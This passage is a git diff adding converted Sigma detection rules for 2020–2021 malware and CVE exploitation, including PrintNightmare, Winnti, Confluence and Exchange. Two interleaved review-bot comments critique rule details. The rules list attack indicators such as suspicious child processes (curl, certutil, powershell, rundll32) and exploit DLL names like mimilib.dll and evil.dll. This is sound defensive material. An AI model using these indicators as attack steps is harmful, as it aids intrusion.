+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml
@@ -0,0 +1,34 @@
+title: Suspicious VBScript UN2452 Pattern
+id: 20c3f09d-c53d-4e85-8b74-6aa50e2f1b61
+status: test
+description: Detects suspicious inline VBScript keywords as used by UNC2452
+references:
+ - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
+author: Florian Roth (Nextron Systems)
+date: 2021/03/05
+modified: 2022/10/09
+tags:
+ - attack.persistence
+ - attack.t1547.001
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - Execute
+ - CreateObject
+ - RegRead
+ - window.close
+ - \Microsoft\Windows\CurrentVersion
+ filter:
+ CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Run
+ condition: process_creation and (selection and not filter)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml
new file mode 100644
index 000000000..16b628b3d
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml
@@ -0,0 +1,33 @@
+title: TAIDOOR RAT DLL Load
+id: d1aa3382-abab-446f-96ea-4de52908210b
+status: test
+description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load
+references:
+ - https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a
+author: Florian Roth (Nextron Systems)
+date: 2020/07/30
+modified: 2021/11/27
+tags:
+ - attack.execution
+ - attack.t1055.001
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection1:
+ CommandLine|contains:
+ - dll,MyStart
+ - dll MyStart
+ selection2a:
+ CommandLine|endswith: ' MyStart'
+ selection2b:
+ CommandLine|contains: rundll32.exe
+ condition: process_creation and (selection1 or ( selection2a and selection2b ))
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml
new file mode 100644
index 000000000..6b0ce0a17
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml
@@ -0,0 +1,42 @@
+title: Winnti Malware HK University Campaign
+id: 3121461b-5aa0-4a41-b910-66d25524edbb
+status: test
+description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
+references:
+ - https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/
+author: Florian Roth (Nextron Systems), Markus Neis
+date: 2020/02/01
+modified: 2021/11/27
+tags:
+ - attack.defense_evasion
+ - attack.t1574.002
+ - attack.g0044
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection1:
+ ParentProcessName|contains:
+ - C:\Windows\Temp
+ - \hpqhvind.exe
+ NewProcessName|startswith: C:\ProgramData\DRM
+ selection2:
+ ParentProcessName|startswith: C:\ProgramData\DRM
+ NewProcessName|endswith: \wmplayer.exe
+ selection3:
+ ParentProcessName|endswith: \Test.exe
+ NewProcessName|endswith: \wmplayer.exe
+ selection4:
+ NewProcessName: C:\ProgramData\DRM\CLR\CLR.exe
+ selection5:
+ ParentProcessName|startswith: C:\ProgramData\DRM\Windows
+ NewProcessName|endswith: \SearchFilterHost.exe
+ condition: process_creation and (1 of selection*)
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml
new file mode 100644
index 000000000..79e0e4db9
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml
@@ -0,0 +1,34 @@
+title: Winnti Pipemon Characteristics
+id: 73d70463-75c9-4258-92c6-17500fe972f2
+status: stable
+description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
+references:
+ - https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
+author: Florian Roth (Nextron Systems), oscd.community
+date: 2020/07/30
+modified: 2021/11/27
+tags:
+ - attack.defense_evasion
+ - attack.t1574.002
+ - attack.g0044
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_1:
+ CommandLine|contains: setup0.exe -p
+ selection_2:
+ CommandLine|contains: setup.exe
+ CommandLine|endswith:
+ - -x:0
+ - -x:1
+ - -x:2
+ condition: process_creation and (1 of selection_*)
+falsepositives:
+ - Legitimate setups that use similar flags
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml
new file mode 100644
index 000000000..4b2d5c861
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml
@@ -0,0 +1,45 @@
+title: Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection
+id: 6fe1719e-ecdf-4caf-bffe-4f501cb0a561
+status: stable
+description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .
+references:
+ - https://twitter.com/mvelazco/status/1410291741241102338
+ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675
+ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
+author: Sittikorn S, Nuttakorn T, Tim Shelton
+date: 2021/07/01
+modified: 2023/10/23
+tags:
+ - attack.privilege_escalation
+ - attack.t1055
+logsource:
+ category: antivirus
+ product: windows
+ service: windefend
+detection:
+ antivirus:
+ EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path'
+ - 1006
+ - 1007
+ - 1008
+ - 1009
+ - 1010
+ - 1011
+ - 1012
+ - 1115
+ - 1116
+ - 1017
+ - 1018
+ - 1019
+ - 1115
+ - 1116
+ Channel: Microsoft-Windows-Windows Defender/Operational
+ selection:
+ Path|contains: :\Windows\System32\spool\drivers\x64\
+ keywords:
+ - File submitted to Symantec # symantec fp, pending analysis, more generic
+ condition: antivirus and (selection and not keywords)
+falsepositives:
+ - Unlikely, or pending PSP analysis
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml
new file mode 100644
index 000000000..c2eef25e8
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler.yml
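Review bot: The `EventID` list under `antivirus:` in the av_printernightmare hunk carries `1115` and `1116` twice (once after `1012` and again after `1019`), so the converted rule ships redundant match values; removing the second `- 1115` / `- 1116` pair leaves the matched set unchanged. Because this file is converter output, the duplicate most likely originates in the upstream rule and should be fixed there as well, otherwise the next automated update will reintroduce it. The `keywords` exclusion `File submitted to Symantec` suppresses the whole event rather than a single field, which the inline comment presents as intended; a one-line comment such as `# excludes pending-analysis submissions only, not all Symantec events` would make that scope explicit for maintainers tuning the rule.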
@@ -0,0 +1,47 @@
+title: Possible CVE-2021-1675 Print Spooler Exploitation
+id: 4e64668a-4da1-49f5-a8df-9e2d5b866718
+status: test
+description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675
+references:
+ - https://github.com/hhlxf/PrintNightmare
+ - https://github.com/afwu/PrintNightmare
+ - https://twitter.com/fuzzyf10w/status/1410202370835898371
+author: Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w, Tim Shelton
+date: 2021/06/30
+modified: 2022/11/15
+tags:
+ - attack.execution
+ - attack.t1569
+ - cve.2021.1675
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: printservice-admin
+detection:
+ printservice_admin:
+ Channel: Microsoft-Windows-PrintService/Admin
+ selection:
+ EventID: 808
+ ErrorCode:
+ - '0x45A'
+ - '0x7e'
+ keywords:
+ - The print spooler failed to load a plug-in module
+ # default file names used in PoC codes
+ - MyExploit.dll
+ - evil.dll
+ - \addCube.dll
+ - \rev.dll
+ - \rev2.dll
+ - \main64.dll
+ - \mimilib.dll
+ - \mimispool.dll
+ falsepositive:
+ - ' registration timed out' # ex: The print spooler failed to load a plug-in module PrintConfig registration timed out
+ condition: printservice_admin and ((selection or keywords) and not falsepositive)
+fields:
+ - PluginDllName
+falsepositives:
+ - Problems with printer drivers
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml
new file mode 100644
index 000000000..caf656ee0
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_exploit_cve_2021_1675_printspooler_operational.yml
@@ -0,0 +1,34 @@
+title: CVE-2021-1675 Print Spooler Exploitation
+id: f34d942d-c8c4-4f1f-b196-22471aecf10a
+status: test
+description: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675
+references:
+ - https://twitter.com/MalwareJake/status/1410421967463731200
+author: Florian Roth (Nextron Systems)
+date: 2021/07/01
+modified: 2022/10/09
+tags:
+ - attack.execution
+ - attack.t1569
+ - cve.2021.1675
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: printservice-operational
+detection:
+ printservice_operational:
+ Channel: Microsoft-Windows-PrintService/Operational
+ selection:
+ EventID: 316
+ keywords:
+ - 'UNIDRV.DLL, kernelbase.dll, '
+ - ' 123 '
+ - ' 1234 '
+ - mimispool
+ condition: printservice_operational and (selection and keywords)
+fields:
+ - DriverAdded
+falsepositives:
+ - Unknown
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml
new file mode 100644
index 000000000..4b2792344
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-1675/win_security_exploit_cve_2021_1675_printspooler_security.yml
@@ -0,0 +1,32 @@
+title: CVE-2021-1675 Print Spooler Exploitation IPC Access
+id: 8fe1c584-ee61-444b-be21-e9054b229694
+status: test
+description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527
+references:
+ - https://twitter.com/INIT_3/status/1410662463641731075
+author: INIT_6
+date: 2021/07/02
+modified: 2022/10/05
+tags:
+ - attack.execution
+ - attack.t1569
+ - cve.2021.1675
+ - cve.2021.34527
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: security
+detection:
+ security:
+ Channel: Security
+ selection:
+ EventID: 5145
+ ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$
+ RelativeTargetName: spoolss
+ AccessMask: '0x3'
+ ObjectType: File
+ condition: security and selection
+falsepositives:
+ - Unknown
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml
new file mode 100644
index 000000000..cfa8f9d99
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml
@@ -0,0 +1,46 @@
+title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt
+id: 245f92e3-c4da-45f1-9070-bc552e06db11
+status: test
+description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
+references:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-26084
+ - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
+ - https://github.com/h3v0x/CVE-2021-26084_Confluence
+author: Bhabesh Raj
+date: 2021/09/08
+modified: 2023/02/13
+tags:
+ - attack.initial_access
+ - attack.execution
+ - attack.t1190
+ - attack.t1059
+ - cve.2021.26084
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ # Monitor suspicious child processes spawned by Confluence
+ CommandLine|contains:
+ - certutil
+ - cmd /c
+ - cmd /k
+ - cscript
+ - curl
+ - ipconfig
+ - powershell
+ - pwsh
+ - regsvr32
+ - rundll32
+ - whoami
+ - wscript
+ ParentProcessName|endswith: \Atlassian\Confluence\jre\bin\java.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml
new file mode 100644
index 000000000..e94eb7e3c
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml
@@ -0,0 +1,32 @@
+title: Potential CVE-2021-26857 Exploitation Attempt
+id: cd479ccc-d8f0-4c66-ba7d-e06286f3f887
+status: stable
+description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service
+references:
+ - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
+author: Bhabesh Raj
+date: 2021/03/03
+modified: 2023/02/07
+tags:
+ - attack.t1203
+ - attack.execution
+ - cve.2021.26857
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ ParentProcessName|endswith: \UMWorkerProcess.exe
+ filter:
+ NewProcessName|endswith:
+ - wermgr.exe
+ - WerFault.exe
+ condition: process_creation and (selection and not filter)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml
new file mode 100644
index 000000000..f00a0f98b
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml
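Review bot: The `filter` block in the CVE-2021-26857 hunk applies `NewProcessName|endswith` to `wermgr.exe` and `WerFault.exe` without a leading path separator, so any image whose name merely ends in those strings is also excluded from the alert, which weakens the exclusion compared with the other process-creation rules in this batch that anchor such values as `\control.exe` or `\rundll32.exe`. Changing the two list items to `- \wermgr.exe` and `- \WerFault.exe` keeps the intended Windows Error Reporting exclusion while limiting it to the exact image names. Since this file is converter output, the same correction belongs in the upstream rule so the next automated update preserves it.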
@@ -0,0 +1,35 @@
+title: Serv-U Exploitation CVE-2021-35211 by DEV-0322
+id: 75578840-9526-4b2a-9462-af469a45e767
+status: test
+description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
+references:
+ - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
+author: Florian Roth (Nextron Systems)
+date: 2021/07/14
+modified: 2022/12/18
+tags:
+ - attack.persistence
+ - attack.t1136.001
+ - cve.2021.35211
+ - detection.emerging_threats
+ # - threat_group.DEV-0322
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_whoami:
+ CommandLine|contains: whoami
+ selection_cmd_1:
+ CommandLine|contains:
+ - ./Client/Common/
+ - .\Client\Common\
+ selection_cmd_2:
+ CommandLine|contains: C:\Windows\Temp\Serv-U.bat
+ condition: process_creation and (selection_whoami and 1 of selection_cmd*)
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml
new file mode 100644
index 000000000..9e22c47ec
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml
@@ -0,0 +1,38 @@
+title: Potential CVE-2021-40444 Exploitation Attempt
+id: 894397c6-da03-425c-a589-3d09e7d1f750
+status: test
+description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations
+references:
+ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
+ - https://twitter.com/neonprimetime/status/1435584010202255375
+ - https://www.joesandbox.com/analysis/476188/1/iochtml
+author: Florian Roth (Nextron Systems), @neonprimetime
+date: 2021/09/08
+modified: 2023/02/04
+tags:
+ - attack.execution
+ - attack.t1059
+ - cve.2021.40444
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ NewProcessName|endswith: \control.exe
+ ParentProcessName|endswith:
+ - \winword.exe
+ - \powerpnt.exe
+ - \excel.exe
+ filter:
+ CommandLine|endswith:
+ - \control.exe input.dll
+ - \control.exe" input.dll
+ condition: process_creation and (selection and not filter)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml
new file mode 100644
index 000000000..76b60849e
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml
@@ -0,0 +1,41 @@
+title: Potential Exploitation Attempt From Office Application
+id: 868955d9-697e-45d4-a3da-360cefd7c216
+status: test
+description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)
+references:
+ - https://twitter.com/sbousseaden/status/1531653369546301440
+ - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444
+ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190
+author: Christian Burkard (Nextron Systems), @SBousseaden (idea)
+date: 2022/06/02
+modified: 2023/02/04
+tags:
+ - attack.execution
+ - attack.defense_evasion
+ - cve.2021.40444
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains:
+ - ../../../..
+ - ..\..\..\..
+ - ..//..//..//..
+ ParentProcessName|endswith:
+ - \winword.exe
+ - \excel.exe
+ - \powerpnt.exe
+ - \msaccess.exe
+ - \mspub.exe
+ - \eqnedt32.exe
+ - \visio.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml
new file mode 100644
index 000000000..27d810c6e
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml
@@ -0,0 +1,41 @@
+title: Potential CVE-2021-41379 Exploitation Attempt
+id: af8bbce4-f751-46b4-8d91-82a33a736f61
+status: test
+description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights
+references:
+ - https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver
+ - https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/
+ - https://www.zerodayinitiative.com/advisories/ZDI-21-1308/
+ - https://www.logpoint.com/en/blog/detecting-privilege-escalation-zero-day-cve-2021-41379/
+author: Florian Roth (Nextron Systems)
+date: 2021/11/22
+modified: 2023/02/13
+tags:
+ - attack.privilege_escalation
+ - attack.t1068
+ - cve.2021.41379
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_img:
+ - NewProcessName|endswith:
+ - \cmd.exe
+ - \powershell.exe
+ - \pwsh.exe
+ - OriginalFileName:
+ - Cmd.Exe
+ - PowerShell.EXE
+ - pwsh.dll
+ selection_parent:
+ ParentProcessName|endswith: \elevation_service.exe
+ MandatoryLabel: S-1-16-16384
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Unknown
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml
new file mode 100644
index 000000000..a1c4090e3
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml
@@ -0,0 +1,29 @@
+title: LPE InstallerFileTakeOver PoC CVE-2021-41379
+id: 7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8
+status: test
+description: Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379
+references:
+ - https://github.com/klinix5/InstallerFileTakeOver
+author: Florian Roth (Nextron Systems)
+date: 2021/11/22
+modified: 2022/07/12
+tags:
+ - attack.initial_access
+ - attack.t1190
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: application
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
+detection:
+ application:
+ Channel: Application
+ selection:
+ EventID: 1033
+ Provider_Name: MsiInstaller
+ Data|contains: test pkg
+ condition: application and selection
+falsepositives:
+ - Other MSI packages for which your admins have used that name
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml
new file mode 100644
index 000000000..dad2d257f
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml
@@ -0,0 +1,40 @@
+title: Potential CVE-2021-42278 Exploitation Attempt
+id: 44bbff3e-4ca3-452d-a49a-6efa4cafa06f
+related:
+ - id: e80a0fee-1a62-4419-b31e-0d0db6e6013a
+ type: similar
+status: test
+description: |
+ The attacker creates a computer object using those permissions with a password known to her.
+ After that she clears the attribute ServicePrincipalName on the computer object.
+ Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
+references:
+ - https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/
+author: frack113
+date: 2021/12/15
+modified: 2023/04/14
+tags:
+ - attack.credential_access
+ - attack.t1558.003
+ - cve.2021.42278
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: system
+detection:
+ system:
+ Channel: System
+ selection:
+ Provider_Name: Microsoft-Windows-Kerberos-Key-Distribution-Center # Active Directory
+ EventID:
+ - 35 # PAC without attributes
+ - 36 # Ticket without a PAC
+ - 37 # Ticket without Requestor
+ - 38 # Requestor Mismatch
+ condition: system and selection
+falsepositives:
+ - Unknown
+fields:
+ - samAccountName
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml
new file mode 100644
index 000000000..f8b3669b4
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml
@@ -0,0 +1,35 @@
+title: Suspicious Computer Account Name Change CVE-2021-42287
+id: 45eb2ae2-9aa2-4c3a-99a5-6e5077655466
+status: test
+description: Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287
+references:
+ - https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45
+author: Florian Roth (Nextron Systems)
+date: 2021/12/22
+modified: 2022/12/25
+tags:
+ - cve.2021.42287
+ - detection.emerging_threats
+ - attack.defense_evasion
+ - attack.persistence
+ - attack.t1036
+ - attack.t1098
+logsource:
+ product: windows
+ service: security
+detection:
+ security:
+ Channel: Security
+ selection:
+ EventID: 4781 # rename user
+ OldTargetUserName|contains: $
+ filter:
+ NewTargetUserName|contains: $
+ condition: security and (selection and not filter)
+falsepositives:
+ - Unknown
+fields:
+ - EventID
+ - SubjectUserName
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml
new file mode 100644
index 000000000..da9ea7a6f
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml
@@ -0,0 +1,31 @@
+title: Suspicious RazerInstaller Explorer Subprocess
+id: a4eaf250-7dc1-4842-862a-5e71cd59a167
+status: test
+description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM
+references:
+ - https://twitter.com/j0nh4t/status/1429049506021138437
+ - https://streamable.com/q2dsji
+author: Florian Roth (Nextron Systems), Maxime Thiebaut
+date: 2021/08/23
+modified: 2022/10/09
+tags:
+ - attack.privilege_escalation
+ - attack.t1553
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ ParentProcessName|endswith: \RazerInstaller.exe
+ MandatoryLabel: S-1-16-16384
+ filter:
+ NewProcessName|startswith: C:\Windows\Installer\Razer\Installer\
+ condition: process_creation and (selection and not filter)
+falsepositives:
+ - User selecting a different installation folder (check for other sub processes of this explorer.exe process)
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml
new file mode 100644
index 000000000..e0c9bd606
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml
@@ -0,0 +1,30 @@
+title: Potential SystemNightmare Exploitation Attempt
+id: c01f7bd6-0c1d-47aa-9c61-187b91273a16
+status: test
+description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
+references:
+ - https://github.com/GossiTheDog/SystemNightmare
+author: Florian Roth (Nextron Systems)
+date: 2021/08/11
